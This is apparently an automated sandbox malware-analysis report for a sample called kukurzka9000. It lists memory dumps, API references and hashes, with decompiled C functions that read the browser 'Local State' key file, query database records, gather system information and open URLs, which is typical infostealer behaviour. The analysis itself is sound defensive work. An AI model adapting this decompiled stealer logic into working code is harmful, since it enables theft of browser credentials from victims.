Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$lstrlen$ClientCloseDeleteDesktopFileGlobalHandleRectWindow
String ID:
API String ID: 2265433170-0
Opcode ID: 42fc98a6e6a89340ea73cfcb9c6e7a19bfd64210cff79040dd24ad1ddd0e5be8
Instruction ID: 01ed2ab5b407dfc10e46f60f726f8b4f8e8024e8c2023dc9817dc03e66c0134a
Opcode Fuzzy Hash: 42fc98a6e6a89340ea73cfcb9c6e7a19bfd64210cff79040dd24ad1ddd0e5be8
Instruction Fuzzy Hash: 53D12E71104211AFE705DFA6DE44E2B7BF9EB89710F004D3DFA54E72A0DB7499208B6A

Uniqueness

Uniqueness Score: -1.00%

Function 022B8051 Relevance: 18.4, APIs: 12, Instructions: 387fileCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 022B8075
GetClientRect.USER32(?,?), ref: 022B81F3
LocalFree.KERNEL32(?), ref: 022B84DA

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(00000000), ref: 022B83BA
CloseHandle.KERNEL32(?), ref: 022B83C5
DeleteFileW.KERNEL32(?), ref: 022B83CC
LocalFree.KERNEL32(?), ref: 022B83D3
LocalFree.KERNEL32(?), ref: 022B83DD
LocalFree.KERNEL32(00000000), ref: 022B84B5
LocalFree.KERNEL32(?), ref: 022B84BF
LocalFree.KERNEL32(?), ref: 022B84C9
LocalFree.KERNEL32(?), ref: 022B84D0

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$ClientCloseDeleteDesktopFileGlobalHandleRectWindow
String ID:
API String ID: 2459997284-0
Opcode ID: 167d8230b01a19888c30f1c1acb982bd4371131abcba0e45631bba1b62aed7e1
Instruction ID: 8249d7f2df1c1c691d9314020fe1aa326c53b73112081555aad4ab5fd2853abf
Opcode Fuzzy Hash: 167d8230b01a19888c30f1c1acb982bd4371131abcba0e45631bba1b62aed7e1
Instruction Fuzzy Hash: 20D12CB1104211AFE705DFA6DE44E6B7BF9FB89710F004D28FA54E7260D7B49920CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 022B6068 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 187fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

LocalFree.KERNEL32(00000000), ref: 022B6114
LocalFree.KERNEL32(?), ref: 022B6223
DeleteFileW.KERNEL32(?,?,?,?,?,022B5DDF), ref: 022B625D
LocalFree.KERNEL32(?,?,?,?,?,022B5DDF), ref: 022B6268
LocalFree.KERNEL32(00000000,?,?,?,?,022B5DDF), ref: 022B6273
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,022B5DDF), ref: 022B627F
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,022B5DDF), ref: 022B6286
LocalFree.KERNEL32(?,?,?,?,?,?,?,022B5DDF), ref: 022B628D

Strings

FALSE, xrefs: 022B61D9
TRUE, xrefs: 022B61DE, 022B61E9

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: FALSE$TRUE
API String ID: 2194112602-1412513891
Opcode ID: 4de672f5ef5204324d375e2cd98ccb70593393dc9187e84e2e65f519924a5a45
Instruction ID: d67eb1afa743672572864f8e47309d88ea9e93c92513c8fffba4b3a88a10e61c
Opcode Fuzzy Hash: 4de672f5ef5204324d375e2cd98ccb70593393dc9187e84e2e65f519924a5a45
Instruction Fuzzy Hash: A1618231A00215AFEF059FE1EE85EAD7BB9EF48350F104428FA15B72A0DB759920CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00409906 Relevance: 16.5, APIs: 13, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00409906(void* _a4, short* _a8) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				char _v32;
				void* _v36;
				char _v60;
				signed int _t53;
				signed int _t55;
				signed int _t60;
				void* _t64;
				signed int _t67;
				void* _t71;
				void* _t78;
				void* _t100;
				signed int _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t126;
				signed int _t127;
				signed int _t133;
				void* _t144;
				char _t149;
				void* _t158;
				void* _t162;
				signed int _t163;
				void* _t164;
				void* _t166;
				void* _t168;
				void* _t173;
				void* _t174;
				signed int _t179;
				void* _t184;

				_t127 = 0;
				_t53 =  *((intOrPtr*)( *0x40e18c))(_a4,  *0x40e430, _t162, _t126);
				_t163 = _t53;
				if(_t163 != 0) {
					_t164 = _t163 + 0x10;
					_t55 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e1f0);
					__eflags = _t55;
					if(_t55 == 0) {
						L5:
						_v16 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t164, _t174) + _t57);
						_t60 = E0040A3E4(_t164,  &_v16, 0, _t127);
						__eflags = _t60;
						if(_t60 != 0) {
							_t166 = _t164 + _t127 * 2 + 2;
							_t64 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t166) + _t62);
							_v8 = _t64;
							_t179 =  *((intOrPtr*)( *0x40e18c))(_t166,  *0x40e20c) - _t166 >> 1;
							_t67 = E0040A3E4(_t166,  &_v8, 0, _t179);
							__eflags = _t67;
							if(_t67 != 0) {
								_t168 = _t166 + _t179 * 2 + 2;
								_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t168) + _t69);
								_v12 = _t71;
								__eflags = E0040A3E4(_t168,  &_v12, 0,  *((intOrPtr*)( *0x40e18c))(_t168,  *0x40e20c) - _t168 >> 1);
								if(__eflags != 0) {
									_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x5000);
									_a4 =  *((intOrPtr*)( *0x40e13c))(_t78, _v8);
									E00409064(__eflags,  &_a4);
									E0040919C( &_a4);
									E004090DC( *0x40e13c,  &_a4);
									E00409265( &_a4);
									E004092CF( &_v12,  &_a4);
									E0040942A( &_a4);
									E00409206(__eflags,  &_a4);
									E00409498( &_a4);
									E00409581(__eflags,  &_a4, _v12);
									_t144 = _a4;
									_v36 = _v16;
									_v32 = _t144;
									_v28 = 0;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_t100 =  *((intOrPtr*)( *0x40e08c))(_t144);
									__eflags = _t100 - 0x40;
									if(_t100 > 0x40) {
										_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t158 = 0x10;
										_t109 = E0040A05F(_t107, _t158);
										_v24 = _t109;
										_t110 =  *((intOrPtr*)( *0x40e13c))(_t108,  *0x40e210);
										_t173 = _v24;
										_t111 = E0040A503(_t110, _t173);
										_t149 =  *0x40e204; // 0x6e78d8
										_v28 = _v28 & 0x00000000;
										_v32 = _t149;
										_v24 = _t111;
										_t112 = E00408619( &_v24);
										_v20 = _t112;
										_t184 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, 0, 0, 0, 0);
										__eflags = 0;
										if(0 != 0) {
											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, _t184, 0, 0, 0);
											__eflags = 0;
											if(0 != 0) {
												E00407EDB(_a8, _t184, 1,  &_v60, 0, 0, _v20,  &_v32);
											}
										}
										LocalFree(_t184);
										LocalFree(_v20);
										LocalFree(_v24);
										LocalFree(_t173);
									}
									LocalFree(_a4);
									LocalFree(_v8);
									LocalFree(_v12);
									L19:
									LocalFree(_v16);
									_t105 = 1;
									L20:
									return _t105;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								L9:
								_push(0xfffffffc);
								L10:
								_pop(1);
								goto L19;
							}
							LocalFree(_v8);
							goto L9;
						}
						_push(0xfffffffd);
						goto L10;
					}
					_t133 = _t55 - _t164;
					__eflags = _t133;
					_t127 = _t133 >> 1;
					if(_t133 >= 0) {
						goto L5;
					}
					_t105 = 0xfffffffe;
					goto L20;
				}
				_t105 = _t53 | 0xffffffff;
				goto L20;
			}

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04f12ae8814da058343c2e57629071c3ba8950ef59b0fb61412e087f2168b86d
Instruction ID: d553b19b407f17417f5105702fe08a0418c2ec115b386657b372b4e652bae7b9
Opcode Fuzzy Hash: 04f12ae8814da058343c2e57629071c3ba8950ef59b0fb61412e087f2168b86d
Instruction Fuzzy Hash: FA81D5B1900205BFDB00DBA6DD45DAE7BB9EB84310B00493AF914F72D1DB78AD11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401C87 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00401C87(WCHAR* __ecx, WCHAR* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, void* _a16) {
				WCHAR* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				void* _t35;
				void* _t56;
				void* _t66;
				char _t73;
				void* _t74;
				WCHAR* _t77;
				void* _t78;
				intOrPtr _t81;
				WCHAR* _t93;
				void* _t96;
				intOrPtr* _t98;
				void* _t99;
				intOrPtr _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				intOrPtr* _t103;

				_v12 = __edx;
				_t73 = 0;
				_v8 = __ecx;
				_v20 = 0;
				_t35 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t96 = _t35;
				_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				if(_a16 != 0) {
					_push(__ecx);
				} else {
					PathCombineW(_t96, __ecx, _v12);
					_push(_t96);
				}
				_t98 = _a4;
				 *_t98 =  *((intOrPtr*)( *0x40e13c))( *_t98);
				_t99 = _v16;
				PathCombineW(_t99, _v8, L"Local State");
				_t77 =  *((intOrPtr*)( *0x40e03c))(_t99, 0x80000000, 1, _t73, 3, _t73, _t73);
				_v12 = _t77;
				_t78 =  *((intOrPtr*)( *0x40e14c))(_t77, _t73);
				_a16 = _t78;
				_t93 =  *((intOrPtr*)( *0x40e044))(0x40, _t78);
				_push(_t73);
				_v8 = _t93;
				_push( &_v20);
				_push(_a16 - 1);
				_push(_t93);
				_push(_v12);
				if( *((intOrPtr*)( *0x40e088))() != 0) {
					_t81 = _a16 + _a16;
					_v24 = _t81;
					_t56 =  *((intOrPtr*)( *0x40e044))(0x40, _t81);
					_t100 = E0040E1F4; // 0x6db410
					_a16 = _t56;
					E0040A16F(E0040A4C2(_v8), _t100,  &_a16,  &_a16);
					_push(_a16);
					if( *((intOrPtr*)( *0x40e08c))() > 0) {
						_t101 = _a8;
						 *_t101 =  *((intOrPtr*)( *0x40e13c))( *_t101, _a16);
						LocalFree(_a16);
						_t66 =  *((intOrPtr*)( *0x40e044))(0x40, _v24);
						_t102 =  *0x40e200; // 0x6ec2b8
						_a16 = _t66;
						E0040A16F(E0040A4C2(_v8), _t102,  &_a16,  &_a16);
						_t74 = _a16;
						if(_t74 != 0) {
							_t103 = _a12;
							 *_t103 =  *((intOrPtr*)( *0x40e13c))( *_t103, _t74);
							LocalFree(_t74);
						}
						_t73 = 1;
					}
					CloseHandle(_v12);
					_t99 = _v16;
				}
				LocalFree(_t99);
				LocalFree(_t96);
				LocalFree(_v8);
				return _t73;
			}

0x00401c9c
0x00401c9f
0x00401ca1
0x00401ca6
0x00401ca9
0x00401cb0
0x00401cbb
0x00401cc1
0x00401cd1
0x00401cc3
0x00401cc8
0x00401cce
0x00401cce
0x00401cd2
0x00401ce6
0x00401ce8
0x00401cec
0x00401d06
0x00401d0f
0x00401d14
0x00401d1e
0x00401d29
0x00401d2b
0x00401d2f
0x00401d32
0x00401d37
0x00401d38
0x00401d39
0x00401d40
0x00401d4e
0x00401d53
0x00401d56
0x00401d5b
0x00401d61
0x00401d72
0x00401d7e
0x00401d85
0x00401d87
0x00401d99
0x00401d9b
0x00401dab
0x00401db0
0x00401db6
0x00401dc7
0x00401dcc
0x00401dd3
0x00401dd5
0x00401de3
0x00401de5
0x00401de5
0x00401ded
0x00401ded
0x00401df1
0x00401df7
0x00401df7
0x00401dfb
0x00401e02
0x00401e0b
0x00401e17

APIs

PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401CC8
PathCombineW.SHLWAPI(?,?,Local State), ref: 00401CEC
LocalFree.KERNEL32(?), ref: 00401D9B
LocalFree.KERNEL32(?), ref: 00401DE5
CloseHandle.KERNEL32(?), ref: 00401DF1
LocalFree.KERNEL32(?), ref: 00401DFB
LocalFree.KERNEL32(00000000), ref: 00401E02
LocalFree.KERNEL32(?), ref: 00401E0B

Strings

Local State, xrefs: 00401CDE

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CombinePath$CloseHandle
String ID: Local State
API String ID: 2998194811-22827320
Opcode ID: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
Instruction ID: e8ea5197d75d1b9ffa148ce1658a92dc358bcbabd267189588b6ee53365c4b7a
Opcode Fuzzy Hash: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
Instruction Fuzzy Hash: B95141B5600215EFEB04DFA5DE85AAE7BB9EF48300F104829F915F7250D774AD20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004092CF Relevance: 13.6, APIs: 9, Instructions: 131stringCOMMON

Download Yara Rule

APIs

lstrcpyn.KERNEL32(00000000,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040933B
lstrcpyn.KERNEL32(00000010,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 0040937B
lstrcpyn.KERNEL32(00000020,00409A74,00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000), ref: 004093BB
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 004093C5

Part of subcall function 0040A4C2: LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
Part of subcall function 0040A4C2: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,afb5c633c4650f69312baef49db9dfa4,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

wsprintfW.USER32 ref: 004093E3

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 004093FB
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A74,00000000), ref: 00409402
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 00409411
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00409A74,00000000,00000000,00000000,00000000,00000000), ref: 0040941B

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$lstrcpyn$lstrlen$AllocByteCharGlobalInfoMultiSystemWidewsprintf
String ID:
API String ID: 850942500-0
Opcode ID: b4d1448f4ce841ff52ca8b65c126921d7f37aa71f907b12cfa87153c2d27789a
Instruction ID: bf3e6bb46204bb3e37d09e038ca25be6bf8868f14e997d98ff16e67e74bb5e03
Opcode Fuzzy Hash: b4d1448f4ce841ff52ca8b65c126921d7f37aa71f907b12cfa87153c2d27789a
Instruction Fuzzy Hash: 0D4192B1A002149FDB04CF69DDC496ABBF8EB48320B14857AFE09FB355D6749D50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 022B8E7A Relevance: 12.8, APIs: 10, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d851c9bc5cda07b011c471ba514d21b876054248c69a850a91c851fea1f9c6b3
Instruction ID: 92c05a8cf9436c5baaf6183c4c48fd8dae2702b0b13821bf97aa7e87910c5e77
Opcode Fuzzy Hash: d851c9bc5cda07b011c471ba514d21b876054248c69a850a91c851fea1f9c6b3
Instruction Fuzzy Hash: E381AF72910209AFDB019BE5DD44EEE7BBEEF84350F004925FA14E72A0DB74AA10CB65

Uniqueness

Uniqueness Score: -1.00%

Function 022B71D6 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232networkCOMMON

Download Yara Rule

APIs

InternetCloseHandle.WININET(00000000), ref: 022B73AD
InternetCloseHandle.WININET(?), ref: 022B73B9
InternetCloseHandle.WININET(00000000), ref: 022B73C0
LocalFree.KERNEL32(0000002F), ref: 022B742E
LocalFree.KERNEL32(?), ref: 022B7437
LocalFree.KERNEL32(00000000), ref: 022B743E

Strings

/, xrefs: 022B7249

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CloseFreeHandleInternetLocal
String ID: /
API String ID: 3319388337-2043925204
Opcode ID: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
Instruction ID: 9f80aa1e7be55bc2154c1ed4fe4569dcf9436af4b596b04bcacee4e1358813a1
Opcode Fuzzy Hash: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
Instruction Fuzzy Hash: 6F71E572A10215BFEB159BA5CD41FBEBBB8EF84700F048429FA15FB290D7B0AD508764

Uniqueness

Uniqueness Score: -1.00%

Function 00408495 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134stringnetworkCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 00408523
InternetOpenUrlW.WININET(0000002F,?,00408819,00000000), ref: 00408574
LocalFree.KERNEL32(00000000), ref: 004085F9
CloseHandle.KERNEL32(00000000), ref: 00408607
LocalFree.KERNEL32(00000000), ref: 0040860E

Strings

y@, xrefs: 00408495
qwrqrwrqwrqwr, xrefs: 00408534

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseHandleInternetOpenlstrlen
String ID: qwrqrwrqwrqwr$y@
API String ID: 1588835542-4056631227
Opcode ID: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction ID: 1aaf66e6ff826a0af1a1f58395baf02585259993efb391a5facff1777f096ed2
Opcode Fuzzy Hash: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction Fuzzy Hash: 4241BE70900115BEEB149BA5CE49EBAB3B8EB44300F00853AE551B72D1EBB4AE54DB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B11FB Relevance: 12.2, APIs: 8, Instructions: 151COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,00000000,00000000,?,00000000,00000000), ref: 022B123C
PathCombineW.SHLWAPI(?,00000000,0040C79C,?,00000000,00000000), ref: 022B1260
LocalFree.KERNEL32(?,?,00000000,00000000), ref: 022B130F
LocalFree.KERNEL32(?,?,00000000,00000000), ref: 022B1359
CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 022B1365
LocalFree.KERNEL32(?,?,00000000,00000000), ref: 022B136F
LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 022B1376
LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 022B137F

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CombinePath$CloseHandle
String ID:
API String ID: 2998194811-0
Opcode ID: 7829dc6c71f128cacdf391500ca352a992bf4a38fd881ec11def570a6cd4989f
Instruction ID: ba97fd0fb15299bdc3ce6a43d1c5c0dfbbc7a9c94649b986fd8d42d6b603fa32
Opcode Fuzzy Hash: 7829dc6c71f128cacdf391500ca352a992bf4a38fd881ec11def570a6cd4989f
Instruction Fuzzy Hash: 6C5130B5A00215EFEB05DFA5DE85AAE7BB9EF48340F104428FA14F7250D774AD20CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00405FEB Relevance: 11.5, APIs: 9, Instructions: 274memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(006E7CF8,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?), ref: 0040615C
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406221

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 0040622B
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406270
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062C7
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 004062CE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 00406325
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,004058D7,?,?,?,00000000,00000000,00000000), ref: 0040632F

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$lstrlen$AllocGlobal
String ID:
API String ID: 3339188435-0
Opcode ID: 319254aba6765eaa7791b5b77958f6401530b4e901e8356fdf1d01df47330636
Instruction ID: ff6bad65333e8fe1a3c55b3bcf1dec483b74064a970dacde523e554a8e1a11d4
Opcode Fuzzy Hash: 319254aba6765eaa7791b5b77958f6401530b4e901e8356fdf1d01df47330636
Instruction Fuzzy Hash: 78A1A872504301ABDB14DF65DD8096BBBF5FF88300F01492DFA59A72A0D775E820CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00407213 Relevance: 10.6, APIs: 7, Instructions: 145
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00407213(intOrPtr* __ecx, intOrPtr _a4, void* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t24;
				void* _t25;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr* _t39;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t59;
				intOrPtr* _t69;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				void* _t87;
				void* _t89;
				void* _t90;
				void* _t91;

				_t59 = __ecx;
				if(_a8 == 0) {
					L18:
					return 0;
				}
				_t24 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t25 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_a8 = _t25;
				_t87 =  *((intOrPtr*)( *0x40e000))(_t24, _a4,  *0x40e284);
				_t27 = E0040A69E( *0x40e000,  &_a8);
				_t89 = _a8;
				if(_t27 == 0) {
					L16:
					LocalFree(_t87);
					L17:
					DeleteFileW(_t89);
					LocalFree(_t89);
					goto L18;
				}
				_push(0);
				_push(_t89);
				_push(_t87);
				if( *((intOrPtr*)( *0x40e184))() == 0) {
					goto L16;
				}
				_t32 =  *0x40e488; // 0x0
				_push( &_v8);
				_push(_t89);
				if( *_t32() != 0) {
					L11:
					DeleteFileW(_t89);
					if(_t89 != 0) {
						LocalFree(_t89);
					}
					if(_t87 != 0) {
						LocalFree(_t87);
					}
					return 1;
				}
				_t39 =  *0x40e494; // 0x0
				_t40 =  *_t39(_v8,  *0x40e238, 0xffffffff,  &_a8, 0);
				_t91 = _t90 + 0x14;
				if(_t40 == 0) {
					while(1) {
						_push(_a8);
						_t41 =  *0x40e48c; // 0x0
						if( *_t41() != 0x64) {
							break;
						}
						_t43 =  *0x40e4b4; // 0x0
						_t44 =  *_t43(_a8, 0);
						_t69 =  *0x40e4b4; // 0x0
						_v12 = _t44;
						_t45 =  *_t69(_a8, 1);
						_t91 = _t91 + 0x10;
						_v16 = _t45;
						_push(_v12);
						if( *((intOrPtr*)( *0x40e08c))() > 1) {
							_t47 = E0040A503( *_t59, _v12);
							_t82 =  *0x40e228; // 0x6e79b8
							 *_t59 = _t47;
							_t48 = E0040A503(_t47, _t82);
							_push(_v16);
							 *_t59 = _t48;
							if( *((intOrPtr*)( *0x40e08c))() > 1) {
								_t51 = E0040A503( *_t59, _v16);
								_t84 =  *0x40e228; // 0x6e79b8
								 *_t59 = _t51;
								_t52 = E0040A503(_t51, _t84);
								_t85 =  *0x40e228; // 0x6e79b8
								 *_t59 = _t52;
								 *_t59 = E0040A503(_t52, _t85);
							}
						}
					}
					 *0x40e4b0(_a8);
					 *0x40e4a4(_v8);
					goto L11;
				} else {
					LocalFree(_t87);
					 *0x40e4b0(_a8);
					 *0x40e4a4(_v8);
					goto L17;
				}
			}

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 004072BC
DeleteFileW.KERNEL32(00000000,?), ref: 0040738A
LocalFree.KERNEL32(00000000), ref: 00407395
LocalFree.KERNEL32(00000000), ref: 004073A0
LocalFree.KERNEL32(00000000), ref: 004073AC
DeleteFileW.KERNEL32(00000000), ref: 004073B3
LocalFree.KERNEL32(00000000), ref: 004073BA

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: fff7a6ba5d09c9eef6c2a5eae38c7ae9a59b5e943db98ac9773f53fe00cef482
Instruction ID: e2ceee55462ef4f82933ad8064aef6a6fdd8d3625f281d360eeb473cc6bbcb89
Opcode Fuzzy Hash: fff7a6ba5d09c9eef6c2a5eae38c7ae9a59b5e943db98ac9773f53fe00cef482
